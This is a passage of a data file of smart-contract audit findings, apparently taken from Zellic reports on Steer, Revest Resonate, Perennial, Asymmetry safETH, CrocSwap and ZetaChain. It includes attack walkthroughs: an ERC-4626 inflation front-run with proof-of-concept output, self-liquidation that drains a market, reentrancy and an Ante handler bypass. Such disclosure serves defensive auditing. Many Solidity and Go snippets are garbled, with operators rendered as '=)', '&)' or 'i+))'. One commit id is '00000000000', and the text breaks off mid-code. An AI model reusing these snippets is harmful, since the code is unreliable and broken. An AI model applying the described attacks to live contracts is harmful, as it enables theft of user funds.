beacon type). Consider also checking the vault state to ensure that it is approved or pending threshold. This issue has been acknowledged by Steer, and a fix was implemented in commit 077d6836.", "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" }, { "title": "3.6 Missing twapInterval and maxTickChange validation", "labels": [ "Zellic" ], "body": "Target: SushiBaseLiquidityManager, BaseLiquidityManager Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A The initialize functions of the Sushi and Uniswap vault base contracts do not include any assertions to ensure that the twapInterval and maxTickChange parameters are within a reasonable range. A user could unintentionally deploy a pool with parameters that leave it vulnerable to oracle manipulation attacks. Assert that the twapInterval and maxTickChange parameters are within reasonable ranges. This issue has been acknowledged by Steer, and a fix was implemented in commit f2881e83 for the SushiBaseLiquidityManager. A fix was implemented in commits ac11ba56 and f7ceb734 for the BaseLiquidityManager.
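As an illustration, such assertions could look roughly like the following; the bounds, types, and function name are assumptions (reasonable values depend on the target pools), not Steer's implemented fix:

error InvalidTwapInterval();
error InvalidMaxTickChange();

uint32 constant MIN_TWAP_INTERVAL = 5 minutes; // illustrative lower bound
uint32 constant MAX_TWAP_INTERVAL = 1 days;    // illustrative upper bound
int24 constant MAX_TICK_CHANGE_CAP = 3000;     // illustrative cap

// Hypothetical helper to be called from initialize().
function validateOracleParams(uint32 twapInterval, int24 maxTickChange) pure {
    if (twapInterval < MIN_TWAP_INTERVAL || twapInterval > MAX_TWAP_INTERVAL)
        revert InvalidTwapInterval();
    if (maxTickChange <= 0 || maxTickChange > MAX_TICK_CHANGE_CAP)
        revert InvalidMaxTickChange();
}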
Zellic Steer", + "html_url": "https://github.com/Zellic/publications/blob/master/Steer - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing validation check in createPool can result in loss of user funds", + "labels": [ + "Zellic" + ], + "body": "Target: Resonate Category: Business Logic Likelihood: Medium Severity: Critical : Critical The function createPool(...))) can be called on an already existing pool when add itionalRate > 0 &) lockupPeriod =) 0. The check for a preexisting pool in initPoo l only addresses the case of (lockupPeriod >) MIN_LOCKUP &) additionalRate =) 0) by using the following check require(pools[poolId].lockupPeriod =) 0, 'ER002'). A malicious user could recreate an already existing pool. This would reset the Pool Queue(...))), which tracks the positions in the queue of the consumer and producer If orders. These orders would effectively be taken out of the matching algorithm. the pool had only processed a limited number of orders, the previous orders could easily be overwritten and no longer modified using modifyExistingOrder(...))). Once overwritten, there would be no way to retrieve the funds from the PoolSmartWallet. Expand the require checks in initPool(...))) to the following: function initPool( address asset, address vault, uint80 rate, uint80 _additional_rate, uint32 lockupPeriod, uint packetSize ) private returns (bytes32 poolId) { poolId = getPoolId(asset, vault, rate, _additional_rate, lockupPeriod, packetSize); Zellic Revest Finance require(pools[poolId].lockupPeriod =) 0 &) pools[poolId]. addInterestRate =) 0, 'ER002'); This finding was remediated by Revest in commit f19896868dd2be5c745c66d9d75219f6 b04a593c. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Failure to cancel orders in modifyExistingOrder", + "labels": [ + "Zellic" + ], + "body": "Target: Resonate Category: Business Logic Likelihood: Medium Severity: Medium : Medium Producers are not able to cancel and recover funds on queued orders using modify ExistingOrder(...))) for cross-asset pools. Calling submitProducer(...))) always sets shouldFarm = false and order.depositedShares > 0 using the oracle price: if(shouldFarm) { IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); order.depositedShares = IERC4626(vaultAdapter).deposit(amount, getAddressForPool(poolId)) / order.packetsRemaining; } else { IERC20(asset).safeTransferFrom(msg.sender, getAddressForPool(poolId), amount); } However, modifyExistingOrder(...))) has missing checks and assumes the orders were deposited in the vault asset instead of the pool asset: if (order.depositedShares > 0) { getWalletForPool(poolId).withdrawFromVault(amountTokens, msg.sender, vaultAdapters[pool.vault]); } else { getWalletForPool(poolId).withdraw(amountTokens, pool.asset, msg. sender); } The attempt to withdraw from the vault asset from the pool wallet will fail. Fortunately, there are no vault assets in the pool wallet to exploit because all vault assets are sent to the FNFT wallet (ResonateSmartWallet) when orders are matched. However, a producer would not be able to retreive the funds of their order. It should be noted that attempting to fix this bug by only directing modifyExistingO rder(...))) to retreive the pool asset instead of the vault asset will result in a critical exploit. This is because submitProducer(...))) accounts for the price of the vault asset while modifyExisitngOrder(...))) does not. 
For example, the producer deposits amount of pool assets and gets credited packets equal to amount / producerPacket: ... sharesPerPacket = IOracleDispatch(oracleDispatch[vaultAsset][pool.asset]) .getValueOfAsset(vaultAsset, pool.asset, true); producerPacket = getAmountPaymentAsset(pool.rate * pool.packetSize / PRECISION, sharesPerPacket, vaultAsset, vaultAsset); ... producerOrder = Order(uint112(amount / producerPacket), sharesPerPacket, msg.sender.fillLast12Bytes()); Through getAmountPaymentAsset(...), the producerPacket scales linearly with the vault price. However, if the producer tries to later modify their order, there is no adjustment from the number of packets to the amount of pool asset: ... if (isProvider) { providerQueue[poolId][position].packetsRemaining -= amount; } else { consumerQueue[poolId][position].packetsRemaining -= amount; } ... uint amountTokens = isProvider ? amount * pool.packetSize * pool.rate / PRECISION : amount * pool.packetSize; If vault price > 1, the producer will not be refunded a sufficient amount of assets for the reduction in packets. This is because submitProducer(...) scales down the packets by the vault price, while modifyExistingOrder(...) does not commensurately scale up the amount of pool asset per packet. If vault price < 1, the producer will be refunded an excessive amount of assets for the reduction in packets. This is because submitProducer(...) scales up the packets by the vault price, while modifyExistingOrder(...) does not commensurately scale down the amount of pool asset per packet. Order cancelling for producers would be nonoperational. The following changes should be made to modifyExistingOrder(...): (1) withdraw the pool asset for cross-asset producer orders and (2) use the price of the vault asset at the time the order was submitted to correctly calculate amountTokens. This finding was remediated by Revest in commit fc3d96d91d7d8c5ef4a65a202cad18a3e86a3d09.", "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" }, { "title": "3.3 Failed approval check in calculateAndClaimInterest", "labels": [ "Zellic" ], "body": "Target: ResonateSmartWallet Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The allowance check for token transfer approval always fails in calculateAndClaimInterest(...): ) public override onlyMaster returns (uint interest, uint sharesRedeemed) { IERC4626 vault = IERC4626(vaultAdapter); if (IERC20(vaultToken).allowance(address(this), vaultAdapter) < interest) { IERC20(vaultToken).approve(vaultAdapter, type(uint).max); } The if statement will always fail because interest has not been initialized from zero. Minimal - other functions in ResonateSmartWallet will be called that also set the token transfer approval to max. In the worst case scenario, the very first producer order will be delayed in claiming interest until the first consumer order reclaims their principal. Change interest to totalShares in the if control statement. This finding was remediated by Revest in commit 6b1b81f6c0310297f5b6cd9a258b99e43c61b092.", "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt.
1 - Zellic Audit Report.pdf" }, { "title": "3.4 Incorrect asset tracking in modifyExistingOrder", "labels": [ "Zellic" ], "body": "Target: Resonate Category: Business Logic Likelihood: High Severity: Critical : Critical For cross-asset pools, calling submitProducer(...) always sets shouldFarm = false and order.depositedShares > 0 using the oracle price. Orders are then enqueued with the pool asset: if (shouldFarm) { IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); order.depositedShares = IERC4626(vaultAdapter).deposit(amount, getAddressForPool(poolId)) / order.packetsRemaining; } else { IERC20(asset).safeTransferFrom(msg.sender, getAddressForPool(poolId), amount); } However, modifyExistingOrder(...) has missing checks and assumes the orders were deposited in the vault asset: if (order.depositedShares > 0) { getWalletForPool(poolId).withdrawFromVault(amountTokens, msg.sender, vaultAdapters[pool.vault]); } else { getWalletForPool(poolId).withdraw(amountTokens, pool.asset, msg.sender); } An attacker could spam submitProducer(...) and modifyExistingOrder(...) to convert pool assets to vault assets at a rate of 1:1. This could be financially lucrative as there are no ways to shut down the protocol or pull other users\u2019 funds. It would also disrupt the balance of the cross-asset pair and hence the potential operation of the pool. Include logic to ensure the vault and pool assets are correctly tracked in cross-asset pools. Revest has implemented the following solution in commit 00000000000: if (order.depositedShares > 0 && IERC4626(vaultAdapters[pool.vault]).asset() == pool.asset) We find their remediation adequately addresses the concerns of this finding.", "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" }, { "title": "3.5 Missing validation check in proxyCall filter can allow dangerous calls", "labels": [ "Zellic" ], "body": "Target: ResonateSmartWallet Category: Business Logic Likelihood: Low Severity: Low : Low The proxyCall function has checks to ensure no calls made to it result in a decrease of capital. However, it has incomplete checks to ensure there are no calls made that could result in a future decrease of capital. For example, it currently includes a filter for approve but none for newer functions like increaseAllowance. The proxyCall function can only be called by the sandwich bot. In the case of a compromise or a security incident involving keys, the lack of the requisite checks could result in a loss of funds. We recommend adding a check for the increaseAllowance function selector. The use of an adjustable white list or black list to control allowed functions would provide additional flexibility for unforeseen risky functions. The management of the white list/black list should be delegated to another administrative account to limit centralization risk. Revest has indicated this will be resolved at deployment time by modifying the deployment script to include the increaseAllowance function signature.", "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt.
1 - Zellic Audit Report.pdf" }, { "title": "3.6 Centralization risk", "labels": [ "Zellic" ], "body": "Target: Project Wide Category: Business Logic Likelihood: N/A Severity: Low : Low At the end of deployment and configuration of the AddressLockProxy, OutputReceiverProxy, ResonateHelper, and Resonate, ownership is primarily concentrated in a single account. However, a specially designated sandwich bot is able to access the proxyCall(...) and sandwichSnapshot functions in the ResonateHelper. These functions cannot move funds outside of the system but can move the location of funds within the system for the purpose of snapshot voting. When new pools are added to Resonate they are created along with their own ResonateSmartWallet and PoolSmartWallet contracts. These wallets can only be accessed by Resonate. There are no owners of the ERC4626 adapters used to interface between Resonate and the vaults. In general, the owner of Resonate cannot stop the protocol or withdraw funds other than through regular use of the protocol. However, they are in control of the address of the oracle. By manipulating the price of the oracle they could grossly inflate the number of packets a producer order is entitled to and profit from matches with consumer orders (more in the discussion on oracle risk). The protocol relies heavily on the proper functioning of several external vaults. Under the current scope of this audit these include Aave and Yearn. Compromise of these vaults could break the system and result in loss of funds. This is viewed as an acceptable and necessary risk. Resonate also relies on several key contracts in the Revest ecosystem. These include a registry that returns the address of Revest and the FNFT Handler. Compromise of this registry could direct Resonate to interact with compromised contracts. Furthermore, compromise of Revest or the FNFT handler could break the protocol or result in loss of funds. For example, Revest is responsible for calling critical functions in Resonate for claiming interest and principal. The burning of FNFTs is handled by Revest and the FNFT handler, and their compromise could potentially result in repeated claiming of interest and/or principal. Control of Resonate is heavily concentrated in a single account; however, compromise of this account presents limited vectors for exploitation. A compromised owner account could alter the price oracle to one in their control and use this to exploit the system for financial gain. The compromise of the sandwich bot could result in abuse of proxyCall and sandwichSnapshot, which could disrupt the proper functioning of the protocol. The use of a multisignature address wallet can prevent an attacker from causing economic damage in the event a private key is compromised. Timelocks can also be used to catch malicious executions. It should be verified that this practice is being followed for not just the core Resonate contracts (including the sandwich bot) but also the other contracts it interacts with listed above. The oracle should be carefully set to a trusted source such as ChainLink or an alternative that uses a sufficiently long TWAP. Care needs to be taken in ensuring the price oracle cannot be manipulated through flash loans or other means of attack. Revest has provided a highly detailed response which adequately addresses our concerns around the access management of critical contracts.
Their procedures for managing centralization risk include the following: Resonate will use, at a minimum, a 3 of 5 multisig. No more than a simple majority will be core team members; the remainder will be drawn from the community. The members of the Resonate multisig will have no more than two members overlapping with the Revest multisig. Sandwich bot access will initially align with Resonate access. Revest currently uses a 3 of 7 multisig. This will be upgraded to a 4 of 7 soon. The registry is currently controlled by a multisig. A multisig will be used to control the oracle systems. The FNFT handler is immutable. An individual will possess no more than one key on a given multisig. In general the use of hardware wallets is either mandated (Resonate) or encouraged (Revest, non-officers). As progressive decentralization occurs, control over many of the contracts in the Revest-Resonate ecosystem will be migrated to intermediary contracts/DAOs.", "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" }, { "title": "3.1 ERC-4626 inflation attack on Vault", "labels": [ "Zellic" ], "body": "Target: Vault.sol Category: Business Logic Likelihood: High Severity: Critical : Critical Vault is vulnerable to an ERC-4626\u2013style inflation attack. In accordance with ERC-4626, Vault is a vault that holds assets on behalf of its users, and whenever a user deposits assets, it issues to the user a number of shares such that the proportion of the user\u2019s shares over the total issued shares is equal to the user\u2019s assets over the total withdrawable assets. This allows assets gained by Vault to increase the value of every user\u2019s shares in a proportional way. ERC-4626 vaults are susceptible to inflation attacks: an attacker can \u201cdonate\u201d funds to the vault without depositing them, increasing the value of a share unexpectedly. In some circumstances, including when an unsuspecting user is the first depositor, an attacker can make back more than they donated, stealing value from the first depositor. We created a proof of concept (POC) for this bug (section 7.1). In this POC, a vault is empty (has no coin balance and zero issued shares), and then a benign user submits a transaction depositing 1,000 coins to the mempool. Before the deposit transaction is mined, an attacker front-runs it with an earlier transaction, which deposits 0.000001 coins and then donates 1,000 coins to the vault. After this, the attacker has one share and the vault has 1,000.000001 coins. Then, the user\u2019s deposit transaction is mined. After the user\u2019s deposit, the vault has 2,000.000001 coins, of which 1,000 was just deposited by the user. Since shares are now worth 1,000.0000005 coins after the attacker\u2019s front-run transactions, the user is given less than one share, which the vault rounds to zero. Finally, the attacker, with their one share that represents all the issued shares, withdraws all of the assets, stealing the user\u2019s coins.
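The rounding step is the crux: at the moment the user's deposit is processed, the vault holds 1,000.000001 coins against one issued share, so the mint works out to shares = floor(deposit * totalSupply / totalAssets) = floor(1,000 * 1 / 1,000.000001) = floor(0.999999...) = 0, and the user's entire deposit accrues to the attacker's single share.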
An excerpt of the POC output is shown below: start ---- state ---- user shares: 0 user balance: 100000.0 attacker shares: 0 attacker balance: 100000.0 ------------- user signs tx depositing 1000, tx in mempool seen by attacker attacker frontruns with a deposit of 0.000001 and a donation of 1000 ---- state ---- user shares: 0 user balance: 100000.0 attacker shares: 1 attacker balance: 98999.999999 ------------- user deposit of 1000 occurs ---- state ---- user shares: 0 user balance: 99000.0 attacker shares: 1 attacker balance: 98999.999999 ------------- attacker withdraws all coins ---- state ---- user shares: 0 user balance: 99000.0 attacker shares: 0 attacker balance: 101000.08684 ------------- Please see GitHub issue #3706 in OpenZeppelin for discussion about how to mitigate this vulnerability. In short, the first deposit to a new Vault could be made by a trusted admin during Vault construction to ensure that totalSupply remains greater than zero. However, this remediation has the drawback that this deposit is essentially locked, and it needs to be high enough relative to the first few legitimate deposits such that front-running them is unprofitable. Even if this prevents the attack from being profitable, an attacker can still grief legitimate deposits with donations, making the user gain fewer shares than they should have gained. Another solution is to track totalAssets internally, by recording the assets gained through its Market positions and not increasing it when donations occur. This makes the attack significantly harder, since the attacker would have to donate funds by affecting price feeds for the underlying assets rather than just sending tokens to the Vault. This finding was acknowledged and a fix was implemented in commit a1b8140e.", "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" }, { "title": "3.2 High-volatility ticks can cause bank run due to negative liquidations", "labels": [ "Zellic" ], "body": "Target: Market.sol Category: Business Logic Likelihood: Low Severity: High : High The liquidation mechanism in Market.sol calculates the maintenance (minimum collateral) and liquidation fee for a given position as follows: function liquidationFee( Position memory self, OracleVersion memory latestVersion, RiskParameter memory riskParameter ) internal pure returns (UFixed6) { return maintenance(self, latestVersion, riskParameter) .mul(riskParameter.liquidationFee) .min(riskParameter.maxLiquidationFee) .max(riskParameter.minLiquidationFee); } function maintenance( Position memory self, OracleVersion memory latestVersion, RiskParameter memory riskParameter ) internal pure returns (UFixed6) { if (magnitude(self).isZero()) return UFixed6Lib.ZERO; return magnitude(self) .mul(latestVersion.price.abs()) .mul(riskParameter.maintenance) .max(riskParameter.minMaintenance); } Since the liquidation fee is not constrained to be less than the collateral, a high-volatility tick can cause the liquidation fee to exceed the deposited collateral. When this happens, the liquidation itself will cause the position to end with negative collateral. So, if a user opens a position with collateral very close to maintenance, the position can then be self-liquidated for more than the deposited collateral following a volatile tick. We created a proof of concept (POC) for this bug (section 7.2).
In this POC, we demonstrate a scenario where the first depositor can self-liquidate the position for more than their deposit, effectively stealing other users\u2019 funds and making the market insolvent. An excerpt of the POC output is shown below: User deposits collateral Deposited collateral: 1000000000 Volatile tick changes price to 1.5 Position liquidated collateral after liquidation: -1001000000 token earned by liquidator: 1001000000 attack successful It is to be noted that although an organic bank run scenario is possible, it does require a fairly volatile tick from the oracle under appropriate tuning parameters. For example, for a power two oracle with riskParameter.liquidationFee = 0.5, we would need a 48% price change between two subsequent oracle ticks. With riskParameter.liquidationFee = 0.7, the required volatility is 18%. These values, while feasible, are still rare in practice. There are two other possible exploitation scenarios. 1. It may be used as a backdoor by a malicious oracle operator to drain the market relying on it. 2. It may lead to a malicious user trying to intentionally exploit this as an infinite money glitch by opening a number of positions and self-liquidating them. However, such a user would need to anticipate an incoming volatile tick. A permanent fix would require liquidations to be capped at the total deposited assets of a user. However, the current Perennial design does not track the total deposit for an account, so implementing that would require a considerable amount of rewrites. For now, this possibility should be minimized via appropriate parameter tuning on a per-market level. This issue has been acknowledged by Equilibria.", "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" }, { "title": "3.3 Markets missing slippage protection", "labels": [ "Zellic" ], "body": "Target: Market.sol Category: Business Logic Likelihood: Medium Severity: Medium : Medium Since the markets have delayed settlements to mitigate arbitrage, the positions opened by users are settled at a later price. Under normal circumstances, the difference in price between when a position is opened and when it is settled should be fairly small. However, volatility in the price feed can cause unexpected fluctuations. Preventing unexpected losses requires a slippage-protection mechanism. Users may lose funds due to unexpected volatility given the lack of a slippage-protection mechanism. Slippage protection could be implemented at the oracle level. While making a version invalid might be difficult, one simple way to handle it would be to cancel trades if the price difference between two versions exceeds a certain threshold. Adding an additional unsafe flag that users can set would keep it usable for users who want to bypass this protection. This issue has been acknowledged by Equilibria.
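One possible shape for such an oracle-level guard, as a hypothetical sketch (the names, the basis-point threshold, and the plain uint256 price representation are assumptions; Perennial's versioned price types are not reproduced here):

uint256 constant MAX_DEVIATION_BPS = 500; // 5%, illustrative threshold

// Returns true when the move between two consecutive oracle versions
// exceeds the threshold, in which case the trade could be cancelled
// unless the user opted in via an unsafe flag.
function isExcessiveMove(uint256 prevPrice, uint256 newPrice) pure returns (bool) {
    uint256 diff = newPrice > prevPrice ? newPrice - prevPrice : prevPrice - newPrice;
    return diff * 10_000 > prevPrice * MAX_DEVIATION_BPS;
}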
Zellic Equilibria", + "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Reentrancy in MultiInvoker due to calls to unauthenticated contracts", + "labels": [ + "Zellic" + ], + "body": "Target: MultiInvoker.sol Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The MultiInvoker is a contract that allows end users to atomically compose several Market and Vault calls into a single transaction, saving gas and ensuring safety because the user can be assured that no other transactions can run between their sequence of transactions. In order to do this, it makes external calls to other contracts, including Market, Vault, and DSU. However, there is no check in MultiInvoker that the addresses supplied are valid contracts registered with their respective factories. MultiInvoker can be called with arbitrary contracts, which can lead to unexpected reentrancy behavior. MultiInvoker should check the provided market or vault address against MarketFac- tory/VaultFactory respectively to verify that it is a valid instance. This finding was acknowledged and a fix was implemented in commit fa7e1c09 with the addition of the following two modifiers: ///)) @notice Target market must be created by MarketFactory modifier isMarketInstance(IMarket market) { if(!marketFactory.instances(market)) revert MultiInvokerInvalidInstanceError(); _; } ///)) @notice Target vault must be created by VaultFactory modifier isVaultInstance(IVault vault) { Zellic Equilibria if(!vaultFactory.instances(vault)) revert MultiInvokerInvalidInstanceError(); _; } Zellic Equilibria", + "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Reentrancy in withdrawEth", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium SafEth supports preminting, where the owner of the contract can stake some ETH and create a supply of SafEth. Staking into this supply is significantly cheaper (in gas) than exchanging every derivative. Whenever a user tries to stake an amount less than what is preminted, the input ETH will go to the SafEth contract and the user is instead given SafEth from the preminted supply, and the contract\u2019s ethToClaim will increase. The contract owner has access to a function that withdraws the ETH used to premint SafEth. function withdrawEth() external onlyOwner { /) solhint-disable-next-line (bool sent, ) = address(msg.sender).call{value: ethToClaim}(\u201d\u201d); if (!sent) revert FailedToSend(); ethToClaim = 0; } This function lacks a reentrancy check and only resets the ethToClaim when the func- tion ends. If the owner is compromised and replaced with a contract that reenters on payment, it is possible to extract all the ETH residing in the contract. However, the only current way to add ETH directly to the SafEth contract is through the premint staking mechanism. From the code pattern of tracking ethToClaim, it is clear that the intention is not to withdraw all the ETH in the contract through this function. A compromised owner can empty the ETH balance of SafEth. Currently this is less of a problem because ETH rarely resides in the contract outside of the intended mecha- nism. However, the fix is easy and blocks future upgrades of the contract from being drained if it stores ETH. 
Zellic Asymmetry Finance We recommend modifying the function to comply with the checks-effects- interactions pattern, function withdrawEth() external onlyOwner { uint256 _ethToClaim = ethToClaim; ethToClaim = 0; /) solhint-disable-next-line (bool sent, ) = address(msg.sender).call{value: _ethToClaim}(\u201d\u201d); if (!sent) revert FailedToSend(); } or add a reentrancy guard to the function. This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit dc7b9c8e. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Function doMultiStake() does not spend all input ETH", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium When a user wants to stake more than singleDerivativeThreshold, and there is not enough left in the premint supply, the contract ends up calling doMultiStake(), which does a weighted stake into multiple derivatives. ...)) uint256 amountStaked = 0; for (uint256 i = 0; i < derivativeCount; i+)) { if (!derivatives[i].enabled) continue; uint256 weight = derivatives[i].weight; if (weight =) 0) continue; IDerivative derivative = derivatives[i].derivative; uint256 ethAmount = i =) derivativeCount - 1 ? msg.value - amountStaked : (msg.value * weight) / totalWeight; amountStaked += ethAmount; ...)) } ...)) This portion of the code shows that it is iterating over all the derivatives, skipping the disabled ones. For each derivative, it stakes (msg.value * weight) / totalWeight ETH, which rounds down slightly due to integer division. To account for the rounding issue, the last iteration stakes msg.value - amountStaked, where the latter is the accumulated value of staked ETH so far. If the last derivative is disabled, the last iteration is skipped due to if (!derivatives[i].enabled) continue;, and the rounding is not accounted for. When the last derivative is disabled, and depending on the actual weights and the staked amount, a small percentage of the staked amount can be left in the contract. This will not be caught by the derivative slippage checks, but it can be caught by the Zellic Asymmetry Finance user\u2019s _minOut parameter when properly set. Disabling the last derivative in the list thus leads to either a loss of funds for the user or blocking the functionality of staking into multiple derivatives from working. The protocol should not rely on the last derivative to be enabled. A possible fix could be to implement something like a getLastEnabledDerivativeIndex() instead, which returns the real index of the last derivative, replacing derivativeCount -1. This can also reduce the amount of iterations ran by the for loop. This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit e4a2864e. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Function firstUnderweightDerivativeIndex() returns a valid index on error", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium When a single stake is triggered, the SafEth contract tries to find the best target deriva- tive to stake into by calling firstUnderweightDerivativeIndex(). 
function doSingleStake( uint256 _minOut, uint256 price ) private returns (uint256 mintedAmount) { uint256 totalStakeValueEth = 0; IDerivative derivative = derivatives[firstUnderweightDerivativeIndex()] .derivative; uint256 depositAmount = derivative.deposit{value: msg.value}(); ...)) } ...)) function firstUnderweightDerivativeIndex() private view returns (uint256) { uint256 count = derivativeCount; uint256 tvlEth = totalSupply() * approxPrice(false); if (tvlEth =) 0) return 0; for (uint256 i = 0; i < count; i+)) { if (!derivatives[i].enabled) continue; uint256 trueWeight = (totalWeight * IDerivative(derivatives[i].derivative).balance() * IDerivative(derivatives[i].derivative).ethPerDerivative( false )) / tvlEth; if (trueWeight < derivatives[i].weight) return i; Zellic Asymmetry Finance } return 0; } The function iterates over all the enabled derivatives, calculating a \u201ctrue weight\u201d by calculating (totalWeight * derivative_balance_value_in_ETH) / safEth_value_i n_ETH. If this value is less than the derivative weight, it is considered underweight and has its index returned. Disabled derivatives are not considered, and their non- contribution is already accounted for in totalWeight. If the total supply of SafEth is 0, or none of the derivatives are considered under- weight, a default value of 0 is returned. This index is then used in doSingleStake with- out checking if that derivative is disabled. If none of the derivatives are underweight, or the total supply of SafEth is 0, a sin- gle stake can end up staking into a disabled derivative. The functionality of disabling derivatives is used in the cases when they appear to be more centralized or get de- pegged or corrupted somehow. Depending on the reason for disabling the derivative, the impact can vary greatly, from total loss of funds to just giving business to a deriva- tive that is getting too centralized. There are many proper ways to fix this. One example could be this: for both tvlEth =) 0 and the default return, fall back to finding the first nondisabled derivative. Revert if there are none. This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit 4247587b. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Floor price is reset on consecutive premints", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Low Severity: Medium : Low When the contract owner premints SafEth, the depositPrice value returned from call- ing stake() is saved. It is stored in the global value floorPrice and acts as a minimum price to be paid when using the preminted supply during staking. Thanks to the floo rPrice, the owners will be able to recoup their investment even if the price should go down later. function preMint( uint256 _minAmount, bool _useBalance ) external payable onlyOwner returns (uint256) { uint256 amount = msg.value; ...)) (uint256 mintedAmount, uint256 depositPrice) = this.stake{ value: amount }(_minAmount); floorPrice = depositPrice; ...)) } function shouldPremint(uint256 price) private view returns (bool) { uint256 preMintPrice = price < floorPrice ? floorPrice : price; uint256 amount = (msg.value * 1e18) / preMintPrice; return amount <) preMintedSupply &) msg.value <) maxPreMintAmount; } In the preMint() function, floorPrice is set directly and will overwrite the previous value there. 
If a premint is executed during a time when the price is high, floorPrice will be set to that high price. If another premint happens before the previous supply is depleted, Zellic Asymmetry Finance the floorPrice will be reset to the new depositPrice. If the price changed, this will under or overvalue the remaining preminted supply. The owner will then risk losing parts of the ETH invested during preminting, as it gets valued at a lower price than it was traded at. If the premint supply is (more or less) depleted before minting again, the problem can be avoided. There is no easy way to tie a certain price to just a part of the premint supply. A possibility could be to introduce a parameter bool reset_floorprice to preMint(), which allows the floorPrice to be reduced. Otherwise, it is limited to only increase, or it remains unchanged (but is checked to be within some limit). This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit ac8ae472. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The function safeTransfer can fail silently", + "labels": [ + "Zellic" + ], + "body": "Target: TransferHelper.sol Category: Business Logic Likelihood: Low Severity: Low : Low The functions safeTransfer and safeTransferFrom use low-level function call for to- kens transferring, which return true value in case of calling non-existent contract. function safeTransfer( address token, address to, uint256 value) internal { (bool success, bytes memory data) = token.call(abi.encodeWithSelector(IERC20Minimal.transfer. selector, to, value)); require(success &) (data.length =) 0 |) abi.decode(data, (bool))) , \u201cTF\u201d); } Since there is no verification of the existence of the contract being called, in the case described above, the transaction will be counted as successful despite the fact that the tokens will not be sent. Although, when initializing the pool, it is checked that the contract balance has been increased by the expected value of liquidity, which makes unpossible the creation of a pool for non-existent tokens. But they will be checked only in case newPoolLiq_ was set, otherwise pool will be created without initial liquidity. Explicitly check the existence of contracts before transferring tokens. TBD Zellic Crocodile Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/CrocSwap - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Ethermint Ante handler bypass", + "labels": [ + "Zellic" + ], + "body": "Target: app/ante/handler_options.go Category: Coding Mistakes Likelihood: High Severity: High : High In commit 3362b13 a fix was added in order to prevent the Ethermint Ante handler from being bypassed (see https://jumpcrypto.com/writing/bypassing-ethermint- ante-handlers/). The patch was based on the original fix implemented in Evmos, but the issue is that ZetaChain has the x/group module enabled, which allows for a new way of bypassing the Ante handler. The group.MsgSubmitProposal allows for arbitrary messages to be run when the pro- posal is passed: /) MsgSubmitProposal is the Msg/SubmitProposal request type. type MsgSubmitProposal struct { /) group_policy_address is the account address of group policy. GroupPolicyAddress string `protobuf:\u201dbytes,1,opt,name=group_policy_address,json=groupPolicyAddre ss,proto3\u201d json:\u201dgroup_policy_address,omitempty\u201d` /) proposers are the account addresses of the proposers. 
/) Proposers signatures will be counted as yes votes. Proposers []string `protobuf:\u201dbytes,2,rep,name=proposers,proto3\u201d json:\u201dproposers,omitempty\u201d` /) metadata is any arbitrary metadata to attached to the proposal. Metadata string `protobuf:\u201dbytes,3,opt,name=metadata,proto3\u201d json:\u201dmetadata,omitempty\u201d` /) messages is a list of `sdk.Msg`s that will be executed if the proposal passes. Messages []*types.Any `protobuf:\u201dbytes,4,rep,name=messages,proto3\u201d json:\u201dmessages,omitempty\u201d` /) exec defines the mode of execution of the proposal, /) whether it should be executed immediately on creation or not. Zellic ZetaChain /) If so, proposers signatures are considered as Yes votes. Exec Exec `protobuf:\u201dvarint,5,opt,name=exec,proto3,enum=cosmos.group.v1.Exec\u201d json:\u201dexec,omitempty\u201d` } Since anyone can create a group with themselves as the only member, they can then submit a proposal with a message that will be executed immediately using the Exec option of Try. The checkDisabledMsgs function is only checking for authz messages, and so the group proposal will not be filtered: func (ald AuthzLimiterDecorator) checkDisabledMsgs(msgs []sdk.Msg, isAuthzInnerMsg bool, nestedLvl int) error { if nestedLvl >) maxNestedMsgs { return fmt.Errorf(\u201dfound more nested msgs than permited. Limit is : %d\u201d, maxNestedMsgs) } for _, msg :) range msgs { switch msg :) 